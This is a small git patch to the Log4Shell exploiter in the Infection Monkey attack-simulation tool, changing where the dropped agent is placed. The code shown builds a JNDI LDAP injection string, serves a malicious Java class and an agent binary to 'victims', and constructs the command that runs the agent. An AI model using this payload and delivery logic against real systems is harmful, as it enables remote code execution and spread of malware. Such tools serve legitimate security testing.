From 90b4038c1461d422d8e47eb6b76fac4bccb638e4 Mon Sep 17 00:00:00 2001 From: vakaris_zilius Date: Thu, 24 Mar 2022 10:37:57 +0000 Subject: [PATCH] Agent: Use random agent name in log4shell exploiter --- monkey/infection_monkey/exploit/log4shell.py | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py index 90c95ce28..af28b66e2 100644 --- a/monkey/infection_monkey/exploit/log4shell.py +++ b/monkey/infection_monkey/exploit/log4shell.py @@ -1,5 +1,6 @@ import logging import time +from pathlib import Path from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT from infection_monkey.exploit.log4shell_utils import ( @@ -10,6 +11,7 @@ from infection_monkey.exploit.log4shell_utils import ( build_exploit_bytecode, get_log4shell_service_exploiters, ) +from infection_monkey.exploit.tools.helpers import get_agent_dest_path from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.i_puppet.i_puppet import ExploiterResultData @@ -60,13 +62,13 @@ class Log4ShellExploiter(WebRCE): self._agent_http_server_thread = None def _start_servers(self): - dropper_target_path = self.monkey_target_paths[self.host.os["type"]] + target_path = get_agent_dest_path(self.host, self.options) # Start http server, to serve agent to victims - agent_http_path = self._start_agent_http_server(dropper_target_path) + agent_http_path = self._start_agent_http_server(target_path) # Build agent execution command - command = self._build_command(dropper_target_path, agent_http_path) + command = self._build_command(target_path, agent_http_path) # Start http server to serve malicious java class to victim self._start_class_http_server(command) @@ -111,7 +113,7 @@ class Log4ShellExploiter(WebRCE): interface_ip = get_interface_to_target(self.host.ip_addr) return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}" - def _build_command(self, path, http_path) -> str: + def _build_command(self, path: Path, http_path) -> str: # Build command to execute monkey_cmd = build_monkey_commandline(self.host, self.current_depth - 1, location=path) if "linux" in self.host.os["type"]: